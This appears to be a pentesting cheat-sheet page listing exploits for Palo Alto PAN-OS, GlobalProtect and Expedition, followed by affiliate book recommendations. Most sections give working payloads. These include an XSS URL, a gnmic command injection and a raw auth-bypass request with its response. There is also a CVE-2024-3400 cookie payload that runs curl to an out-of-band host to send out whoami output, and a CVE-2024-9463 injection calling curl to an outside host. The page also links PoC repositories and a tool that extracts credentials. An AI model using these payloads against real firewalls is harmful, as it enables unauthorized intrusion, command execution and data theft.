Palo Alto

Palo Alto Exploits

CVE-2025-0133 - XSS

/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=<svg xmlns%3D"http%3A%2F%http://2Fwww.w3.org%2F2000%2Fsvg"><script>prompt("XSS")<%2Fscript><%2Fsvg>&domain=(empty_domain)&computer=computer

Nuclei Template:

PAN-OS - Reflected Cross-Site ScriptingAI-Powered Template Generation and Scanning

CVE-2025-0110 - PAN-OS Command Injection

./gnmic -a <IP>:<PORT> -u <username> --password=<password> --skip-verify \
-e json_ietf subscribe --mode once --log \
--path 'pan-logging:/pan/logging/query/custom[type=$(echo system > file1; cat file1)][direction=fwd][max_logs=2][period=last-24-hrs]' 

GitHub - openconfig/gnmic: gNMIc is a gNMI CLI client and collectorGitHub

PaloAlto OpenConfig Plugin: Command Injection VulnerabilityGitHub

Google Releases PoC for CVE-2025-0110 Command Injection in PAN-OS FirewallsDaily CyberSecurity

CVE-2025-0108 - Authentication Bypass

GitHub - fr4nc1stein/CVE-2025-0108-SCAN: Detects an authentication bypass vulnerability in Palo Alto PAN-OS (CVE-2025-0108).GitHub

https://slcyber.io/blog/nginx-apache-path-confusion-to-auth-bypass-in-pan-os/slcyber.io

GET /unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css HTTP/1.1
Host: my.testing.environment
Connection: close

...

HTTP/1.1 200 OK
Date: Mon, 02 Dec 2024 02:34:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close

<html>
<head>
<title>Zero Touch Provisioning</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
...

GitHub - iSee857/CVE-2025-0108-PoC: Palo Alto Networks PAN-OS 身份验证绕过漏洞批量检测脚本(CVE-2025-0108)GitHub

GitHub - FOLKS-iwd/CVE-2025-0108-PoC: This repository contains a Proof of Concept (PoC) for the **CVE-2025-0108** vulnerability, which is an **authentication bypass** issue in Palo Alto Networks' PAN-OS software. The scripts provided here test for the vulnerability by sending a crafted HTTP request to the target systems.GitHub

CVE-2024-3400 Palo Alto File Write Exploit

GitHub - ak1t4/CVE-2024-3400: Global Protec Palo Alto File Write ExploitGitHub

GitHub - ihebski/CVE-2024-3400: CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtectGitHub

GitHub - h4x0r-dz/CVE-2024-3400: CVE-2024-3400 Palo Alto OS Command InjectionGitHub

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.01
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

PAN-OS management interface unauth RCE (CVE-2024-0012 + CVE-2024-9474

Exploit module for PAN-OS management interface unauth RCE (CVE-2024-0012 + CVE-2024-9474) by sfewer-r7 · Pull Request #19663 · rapid7/metasploit-frameworkGitHub

Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474watchTowr Labs

GitHub - watchtowrlabs/palo-alto-panos-cve-2024-0012GitHub

Palo Alto Global Protect

GitHub - t3hbb/PanGP_Extractor: Tool to extract username and password of current user from PanGPA in plaintextGitHub

Extracting Plaintext Credentials from Palo Alto Global Protect - Shells.SystemsShells.Systems

Palo Alto Networks Expedition

CVE-2024-5910 - Remotely reset the Expedition application admin credentials

Palo Alto Expedition: From N-Day to Full CompromiseHorizon3.ai

CVE-2024-9463 - RCE unauthenticated

POST /API/convertCSVtoParquet.php HTTP/1.1         
Host: http://watchTowr.com         
Content-Type: application/x-www-form-urlencoded        
Content-Length: 72        

ram=watchTowr`curl+https://watchTowr.com`

Ref: https://x.com/watchtowrcyber/status/1844306954245767623?t=ibt0GSdt3qTVwHw54pdM1A&s=03

CVE-2024-9464 - Authenticated command injection vulnerability

GitHub - horizon3ai/CVE-2024-9464: Proof of Concept Exploit for CVE-2024-9464GitHub

CVE-2024-9465 - Unauthenticated SQL Injection

GitHub - horizon3ai/CVE-2024-9465: Proof of Concept Exploit for CVE-2024-9465GitHub

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more

• Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them

• Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.